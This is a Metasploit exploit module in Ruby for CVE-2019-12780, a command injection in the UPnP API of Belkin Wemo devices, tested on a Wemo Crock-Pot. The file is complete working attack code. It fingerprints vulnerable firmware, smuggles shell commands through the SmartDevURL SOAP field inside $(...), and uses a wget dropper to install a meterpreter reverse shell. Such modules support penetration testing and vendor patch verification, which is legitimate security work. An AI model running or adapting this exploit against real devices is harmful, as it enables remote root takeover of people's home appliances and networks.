1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7

8
  Rank = ExcellentRanking
9

10
  include Msf::Exploit::Remote::HttpClient
11
  include Msf::Exploit::CmdStager
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Belkin Wemo UPnP Remote Code Execution',
19
        'Description' => %q{
20
          This module exploits a command injection in the Belkin Wemo UPnP API via
21
          the SmartDevURL argument to the SetSmartDevInfo action.
22

23
          This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
24
          devices are known to be affected, albeit on a different RPORT (49153).
25
        },
26
        'Author' => [
27
          'phikshun', # Discovery, UFuzz, and modules
28
          'wvu',      # Crock-Pot testing and module
29
          'nstarke'   # Version-checking research and implementation
30
        ],
31
        'References' => [
32
          ['CVE', '2019-12780'],
33
          ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
34
          ['URL', 'https://github.com/phikshun/ufuzz'],
35
          ['URL', 'https://gist.github.com/phikshun/10900566'],
36
          ['URL', 'https://gist.github.com/phikshun/9984624'],
37
          ['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'],
38
          ['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
39
          ['URL', 'http://www.wemo.com/']
40
        ],
41
        'DisclosureDate' => '2014-04-04',
42
        'License' => MSF_LICENSE,
43
        'Platform' => ['unix', 'linux'],
44
        'Arch' => [ARCH_CMD, ARCH_MIPSLE],
45
        'Privileged' => true,
46
        'Targets' => [
47
          [
48
            'Unix In-Memory',
49
            {
50
              'Platform' => 'unix',
51
              'Arch' => ARCH_CMD,
52
              'Type' => :unix_memory,
53
              'DefaultOptions' => {
54
                'PAYLOAD' => 'cmd/unix/generic'
55
              }
56
            }
57
          ],
58
          [
59
            'Linux Dropper',
60
            {
61
              'Platform' => 'linux',
62
              'Arch' => ARCH_MIPSLE,
63
              'Type' => :linux_dropper,
64
              'DefaultOptions' => {
65
                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
66
              }
67
            }
68
          ]
69
        ],
70
        'DefaultTarget' => 1,
71
        'Notes' => {
72
          'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],
73
          'Stability' => [CRASH_SAFE],
74
          'SideEffects' => [ARTIFACTS_ON_DISK],
75
          'Reliability' => [REPEATABLE_SESSION]
76
        }
77
      )
78
    )
79

80
    register_options([
81
      Opt::RPORT(49152)
82
    ])
83

84
    register_advanced_options([
85
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
86
    ])
87
  end
88

89
  def check
90
    checkcode = CheckCode::Unknown
91

92
    res = send_request_cgi(
93
      'method' => 'GET',
94
      'uri' => '/setup.xml'
95
    )
96

97
    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
98
      vprint_error('Wemo-enabled device not detected')
99
      return checkcode
100
    end
101

102
    vprint_good('Wemo-enabled device detected')
103
    checkcode = CheckCode::Detected
104

105
    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
106
              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && ::Regexp.last_match(1) && Rex::Version.new(::Regexp.last_match(1))
107

108
    unless version
109
      vprint_error('Could not determine firmware version')
110
      return checkcode
111
    end
112

113
    vprint_status("Found firmware version: #{version}")
114

115
    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
116
    if version < Rex::Version.new('2.00.8643')
117
      vprint_good("Firmware version #{version} < 2.00.8643")
118
      checkcode = CheckCode::Appears
119
    else
120
      vprint_error("Firmware version #{version} >= 2.00.8643")
121
      checkcode = CheckCode::Safe
122
    end
123

124
    checkcode
125
  end
126

127
  def exploit
128
    case target['Type']
129
    when :unix_memory
130
      execute_command(payload.encoded)
131
    when :linux_dropper
132
      cmdstager = generate_cmdstager(
133
        flavor: :wget,
134
        temp: datastore['WritableDir'],
135
        file: File.basename(cmdstager_path),
136
        noconcat: true
137
      )
138

139
      # HACK: "chmod +x"
140
      cmdstager.unshift("cp /bin/sh #{cmdstager_path}")
141
      cmdstager.delete_if { |cmd| cmd.start_with?('chmod +x') }
142
      cmdstager = cmdstager.join(';')
143

144
      vprint_status("Regenerated command stager: #{cmdstager}")
145
      execute_command(cmdstager)
146
    end
147
  end
148

149
  def execute_command(cmd, _opts = {})
150
    send_request_cgi(
151
      'method' => 'POST',
152
      'uri' => '/upnp/control/basicevent1',
153
      'ctype' => 'text/xml',
154
      'headers' => {
155
        'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
156
      },
157
      'data' => generate_soap_xml(cmd)
158
    )
159
  end
160

161
  def generate_soap_xml(cmd)
162
    <<~EOF
163
      <?xml version="1.0" encoding="utf-8"?>
164
      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
165
        <s:Body>
166
          <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
167
            <SmartDevURL>$(#{cmd.encode(xml: :text)})</SmartDevURL>
168
          </u:SetSmartDevInfo>
169
        </s:Body>
170
      </s:Envelope>
171
    EOF
172
  end
173

174
  def cmdstager_path
175
    @cmdstager_path ||=
176
      "#{datastore['WritableDir']}/#{rand_text_alphanumeric(8..42)}"
177
  end
178

179
end
180

181